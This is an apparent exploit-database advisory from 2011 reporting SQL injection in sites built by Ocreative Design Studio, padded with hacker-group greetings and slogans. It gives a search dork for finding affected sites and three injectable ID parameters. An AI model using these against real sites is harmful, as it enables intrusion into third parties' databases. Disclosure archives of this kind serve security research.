######################################################################### [+] Exploit Title : Ocreative Design Studio [ Sql Injection Vulnerability] [+] Author : eXeSoul [+] Contact : exe.soul@live.com [+] Date : 16-02-2011 [+] category: Web Apps [SQli] [+] HomePage : www.indishell.in [+] Version : all [+] Tested on : windows/linux [+] Vulnerability Style : PHP [ Sql Injection Vunerability ] [+] Vendor: http://www.ocreativedesign.com [+] VCE: () [+] Dork : "Web Design & Hosting by Ocreative Design Studio" ######################################################################### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX, G00g!3 W@rr!0r, Nazz , r45c4l, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Bon3 ,Badboy-Albinia, Mr.SK , I-H Guru, X__HMG, AK-47 Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ......\m/ INDIAN CYBER ARMY \m/...... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Vulnerability: *SQL injection Vulnerability* [#] http://server/programs.php?ID=[SQli] [#] http://server/event.php?ID=[SQli] [#] http://server/details.php?ID=[SQli] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam => c0d3 for motherland, h4ck for motherland Enj0y! :D [#] DOne now time to rock \m/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # JAY HIND.!! JAY SHREE RAM.!! JAY SHREE KRISHANA.!! JAY MAHADEV.!! # eXploit-db.com [16-2-2011] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #End 0Day#